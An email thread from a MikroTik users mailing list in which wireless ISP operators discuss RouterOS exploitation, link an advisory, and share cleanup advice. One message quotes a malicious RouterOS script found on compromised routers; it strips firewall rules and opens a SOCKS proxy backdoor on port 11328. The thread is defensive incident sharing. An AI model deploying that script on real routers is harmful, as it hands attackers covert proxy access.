Yep. Busy. Busy. We’re doing the same thing. Zipping things up tight. 

 

73

-- 

Bob Pensworth, WA7BOB | General Manager

 <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-0000, x1

 

From: Shawn C. Peppers <videodirectwispal...@gmail.com> 
Sent: Sunday, August 5, 2018 9:06 PM
To: Bob Pensworth <beeper.bo...@gmail.com>
Cc: Mikrotik Users <mikrotik-users@wispa.org>
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

Been cleaning this up for random clients daily now....hence the reason i am 
very strongly voicing zero open ports (except l2tp and ipsec) to the outside 
network...  

 

:: // Shawn Peppers

:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com> 


On Aug 5, 2018, at 7:57 PM, Bob Pensworth <beeper.bo...@gmail.com 
<mailto:beeper.bo...@gmail.com> > wrote:

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

 

/ip firewall filter remove [/ip firewall filter find where comment ~ "port 
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 
connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip 
firewall filter add chain=input protocol=tcp port=11328 action=accept 
comment="port 11328";/ip firewall filter move [/ip firewall filter find 
comment="port 11328"] 1;

 

-- 

Bob Pensworth, WA7BOB | General Manager

 <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-0000, x1

 

From: mikrotik-users-boun...@wispa.org 
<mailto:mikrotik-users-boun...@wispa.org>  <mikrotik-users-boun...@wispa.org 
<mailto:mikrotik-users-boun...@wispa.org> > On Behalf Of Shawn C. Peppers via 
Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org> ; 
memb...@wisp.org <mailto:memb...@wisp.org> 
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

I have not tested this yet but....

 

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com <http://DirectlinkAdmin.com> 

_______________________________________________
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Reply via email to